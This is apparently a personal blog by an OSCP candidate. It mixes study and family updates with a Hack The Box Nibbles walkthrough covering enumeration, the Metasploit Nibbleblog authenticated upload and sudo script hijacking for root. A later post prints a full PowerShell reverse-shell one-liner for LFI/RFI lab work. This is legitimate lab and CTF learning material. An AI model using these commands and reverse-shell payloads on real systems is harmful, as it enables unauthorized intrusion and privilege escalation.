Root. On an active HTB. Woot!

Okay, so through working at the box for most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pore over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far into the book, but I have already quickly started picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal reiterated this in the book by basically throwing shade on people who follow their passion.  Simply being that many of us don’t know our passion or think we do, only to ask “is this really what I want out of life?”

I go back to work from Parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, in the words of Steve Martin – be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then on to VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

Hack The Box :: Nibbles Walk-through

Priv esc threw me for a loop on this one

This is a small win for me. It’s a retired box, so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that, of all the walk-throughs I read, none of the privesc steps could be replicated as written. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, this might be a crumb for you to push through.

First, I ran nmap on the target: default scripts (-sC), version detection (-sV), and all output formats saved under the name “initial” (-oA). I chose to be verbose on everything (-vvv) as my connection to the web is pretty poor at the moment, and I wanted to see results as they came in.

nmap -sC -sV -oA initial -vvv 10.10.10.75
(nmap output: ports 22 and 80 open)

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the page source, I found /nibbleblog/ referenced as a path. Always read the source of a “boring” landing page; comments and paths left behind by developers are cheap enumeration.

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the Atom feed: http://10.10.10.75/nibbleblog/feed.php. The feed title is “nibbles”. Also, http://10.10.10.75/nibbleblog/content/private/users.xml is readable without authentication and shows admin as a user. Two pieces of information leakage, one username and one likely password. One caveat before you start guessing: Nibbleblog blacklists the client IP after a handful of failed logins, so try the obvious candidates by hand rather than throwing a wordlist at admin.php. Play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and the best match is a Metasploit module: https://www.exploit-db.com/exploits/38489. It targets the Nibbleblog 4.0.3 arbitrary file upload (CVE-2015-6967): once you are authenticated to the admin panel, the “My image” plugin accepts any file as its image, including PHP, and stores it as image.php under content/private/plugins/my_image/. So this is an authenticated upload, which is why the credentials above matter. Let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set the required options (RHOSTS, TARGETURI /nibbleblog/, USERNAME admin, PASSWORD nibbles, and LHOST for the reverse handler), then run it.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, privesc. This was the hardest thing and took me a while to get down. But finally, this article did me good, and I was able to work it out. One of the first things to figure out is whether there are any commands you are allowed to invoke as root. You do that by calling:

sudo -l

The output shows that nibbler can run /home/nibbler/personal/stuff/monitor.sh as root, and NOPASSWD, so no password is needed. The important detail is the path: the sudoers rule points at a file inside nibbler’s own home directory, which means the user the rule is supposed to restrict controls the contents of the thing root will execute. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file (sudo matches on the literal path and refuses to run a file that does not exist). Now we need to modify monitor.sh to have the following code:

#!/bin/bash
/bin/bash -i

You can do this by appending it to the end of the existing file, by uploading a replacement with netcat and overwriting it, or by getting back to meterpreter and uploading the file. Make sure the file is executable (chmod +x monitor.sh), and check with ls -l that it is owned by nibbler and sits at exactly the path sudo -l printed; if the unzip put it somewhere else, sudo will not match the rule.

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt
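This is the check I now run before I touch anything sudo lets me execute, written here as an added example rather than something from the original post: pull the commands out of the sudo -l output, then tell me whether each one is a file I already control (writable), one I can create (missing but the parent directory is mine), or one I cannot touch. The sample sudo -l text is constructed to match what this box prints; the live path is behind the live argument so the script is safe to run anywhere.

```shell
#!/bin/sh
# Added example (not from the original post): triage the commands a "(root)" sudoers
# entry allows, and report which of them the current user can already modify or create.
set -e

# Constructed sample of sudo -l output (shaped like what Nibbles prints for nibbler).
SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# Read sudo -l output on stdin, print one command path per line.
# Handles "(root) NOPASSWD: /a, /b --flag": drops the tags, splits on commas, drops arguments.
root_targets() {
    sed -nE 's/^[[:space:]]*\(root\)[[:space:]]*((NOPASSWD|SETENV|NOEXEC):[[:space:]]*)*//p' \
    | tr ',' '\n' \
    | sed -E 's/^[[:space:]]+//; s/[[:space:]].*$//' \
    | sed '/^$/d'
}

# Classify one path from the current user's point of view.
check_target() {
    p="$1"
    if [ ! -e "$p" ]; then
        # sudo matches the literal path and refuses to run a missing file, but if the
        # parent directory is ours we get to create it (this is the personal.zip case).
        d=$(dirname "$p")
        if [ -w "$d" ]; then echo "missing, parent writable: $p"; else echo "missing: $p"; fi
    elif [ -w "$p" ]; then
        echo "writable: $p"
    else
        echo "not writable: $p"
    fi
}

# Offline demo on the constructed sample.
printf '%s\n' "$SAMPLE_SUDO_L" | root_targets | while read -r p; do check_target "$p"; done

# Live mode on a real shell: ./sudo_triage.sh live  (-n keeps sudo from prompting)
if [ "${1:-}" = "live" ]; then
    sudo -n -l 2>/dev/null | root_targets | while read -r p; do check_target "$p"; done
fi
```

Any “writable” or “missing, parent writable” line is the same bug as this box: a sudoers entry that trusts a file the unprivileged user can change. The fix for an administrator is to point such rules only at root-owned files in root-owned directories, which is also exactly what an auditor should grep sudoers for.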

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!

Update with a path forward…

For the last few days of parental leave, I will have some opportunity to reflect and decide if I would like to continue my OSCP journey. As of right now, the answer is yes. If others have done it, why not me? I think it’s pretty common to take a test, and if you fail it, flail around a bit before getting your grounding. I feel like I have regained some grounding and have a path forward. There are a few rocks on the path, but it’s a path none the less.

I have 6 days – between now and Saturday – where I will have some time to myself to do some deep work and deep thinking about my professional competency. I am going to not only use this time to reflect on that but also do some minimal fasting, exercising, prayer, and meditation. I have a few habits that I need to place a stake in the ground on (little things) and work on my path forward with studying. I am inspired to do this through Bill Gates’s think weeks, and also a book I listened to called “Deep Work: Rules for Focused Success in a Distracted World” by Cal Newport. Cal is a computer science professor at Georgetown University, and his book spoke loads to me.

I have really been thinking about the amount of time that I take studying around OSCP. Things like Bash, Python, Linux, and Powershell. I think if I do that, I will never get to the actual pen-testing. I needed something structured, and just doing Hack the Box/VulnHub wasn’t structured.

Step in PentesterLab. It’s 30 bucks a month and structured. I really like the fact that there is a public profile where I can show the certs I managed to get along the way.

Woot! It’s some direction!

I read a bit about it, and even though it’s a bit more web app pen-testing than the OSCP, which does cover web pen-testing but also really focuses on network pen-testing, I really like it. I have done the intro labs and am working through *nix currently. To pull in more network pen-testing and the full methodology, I plan on doing a retired HTB machine walkthrough and an active machine on HTB daily – till Sat. I will have to re-assess once I am back at work and don’t have as much time to myself.

I have also been using this blog more like an emotional dump of my studying. This blog really was more for the technical aspects that I was working through on the OSCP, so I will gear it more to that moving forward. No one really cares how I feel all the time. 😛

Once and if I pull some substantial time into PentesterLab and HTB, then we’ll chat about the OSCP.

On to the work!

I feel so far from getting my OSCP… just a little burnt

I have been trying to study, but it’s been rough. My main priority has been my son, and that I think is a good thing. But right now, I have no work responsibility, and I am having a hard time working deep and smart. I am flailing around like a fish out of water.

I am thinking about working on the basics, but it’s just so rough getting through it. I want the sexy stuff, like working on a box all the way through to root. So I figured I would work on the basics for an hour and then do a VulnHub or a HTB… but it’s not working. I can’t think straight. I think I am a bit burnt out.

So I did BSidesDC, and I played in Pros V Joes, and I have to say that I felt much better about it than I did last year….

I think I really still want this cert. Pressing forward, I will work on a VulnHub first and then dig into a basic again. I also need to think about when I will start the labs again. Maybe after things quiet down a bit from coming back to work.

Studying on Parental Leave

Look at this guy – him and I bonded together yesterday. My wife went back to work, and I chilled with him for the day. I gotta tell ya, he did really well on his bottle. It was honestly day 1, and he is starting to get the bottle down.

My little man!

Which leads to the next thing. So I am on parental leave till November, and I was hoping that I could get some studying in with this dude. Well, I need to be patient with myself since that’s not going to happen for a while – at least till we get used to each other. So, yah, it’s going to be slow going with OSCP again. I haven’t signed back up for the labs, which is good. There is a lot I can do without them, and once the labs are up, the clock is ticking to get them done.

I really, really want to pass this exam. I have to say though, I have already been learning a lot, but I have a long way to go to pass. I think I can do it.

The Journey is so long and I am so tired

This is getting ridiculous. It’s mainly my fault, but some of these exercises in the labs make me want to bang my head on the wall – really hard.

I am trying, and documenting the exercises. I have been working at them for over five months now, and yes, there are a few that have given me some hiccups. The ones that are hitting me hard are using sqlmap to obtain a shell on a target machine, using password attacks that were described in the book, and the Port Redirection/Tunneling. A lot of this is my fault for not going harder at the problems, and faster. For example, I did get the BoFs, but that was seriously like almost a half a year ago.

It looks like I have 12 days left in the labs, and I am definitely not going to get 10 boxes as root and document them all in that amount of time. Oh yeah, I also signed up for the test in September. Oh, and my wife and I are expecting a child in July.

To make matters worse, the prices are going up. So, it’s been real, but I am not sure if I am going to get this cert any time soon. I am not quite sure where to go from here. So let’s analyze, shall we?

Option one:
(ノಠ益ಠ)ノ彡┻━┻

Okay, let’s put the table back….
┳━┳ ヽ(ಠل͜ಠ)ノ

Let’s try that again:

  1. Just spend every morning for 2 hours in the lab and the exercises. Try to do the areas that you didn’t get (the exercises that you didn’t get) and if you don’t get them, it’s no biggie. Just try to get back into the material, and hit it hard for the last 12 days.
  2. Post-time: You didn’t get the 5 points. You’ll get them after your first attempt at the exam. Because face it, you aren’t going to pass your first attempt. So here is where HTB and ippsec walkthroughs will help you. Step one, find some free BoFs and PRACTICE them. You know that’s a solid 20 points.
  3. Walkthrough the boxes in July. Start figuring out your methods. Just try to get as comfortable you can to at least try the exam in September. August, keep on going. Learn as much as you can from tutorials, the book, watch the videos again and relate them to HTBs.
  4. Fri, 06 Sep 2019, 05:00 (America/New_York), just try.
  5. Buy 30 days of lab – $300 bones. Finish up the exercises and the boxes. Get the 5 points, then schedule your exam again. Take it.

Remember what your wife said, it’s not how quickly you pass, but when you pass. Don’t give up, don’t get scared. Just go for it. You got this.

Finally, I am getting to Metasploit. Wow.

Well, I haven’t written for a while, but my daughter turned 4, my wife is expecting in July, and I am waking up pretty early to start studying these days. It’s a slow process, but I’ll get there. My plan is to finish the labs, practice on hackthebox.eu, and take the test in early September. I feel like failing the first time is simply a rite of passage, so if that happens, at least I’ll know what to expect for the next time. I will get this cert. It might take time, but I am going to get it.

I am getting to the end of the labs, and I know now why metasploit is last and why you can only use it on one box – it’s pretty powerful. I did use it to pop my first shell on the lab machines – using MS08-067 to exploit SMB!

This gif never gets old…

I didn’t know about meterpreter before the exploit, so I was hanging onto my shell for dear life, trying to upload a privilege escalation executable using certutil and tftp, but the shell was non-interactive and yeah… didn’t get far. But I started reading about meterpreter and all I could think about is how I am going to root that box now with my new knowledge.

The labs ask you to perform a few things that I had to skip and gain my knowledge on – i.e., using metasploit to dump hashes and pass the hash. So now, I have to go back and finish up those labs. My lab report, without any writeups of pwning the 10 machines, is almost at 200 pages. I am not going to fail to get those 5 points. Even if I have to come back and pay for more lab time.

I will have to say that I am really enjoying my time learning through PWK. People slam it for not being current (the exploits and the material), but I think that’s part of it – TRYING HARDER. Also, forget that man, it’s a VERY solid foundation for pen testing.

RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and asked myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old, and HTTP caching wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night and couldn’t get it. This AM, I realized a few mistakes in my URL, and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('[IPADDR]',[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of the things they say in the exercise is a quote from Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!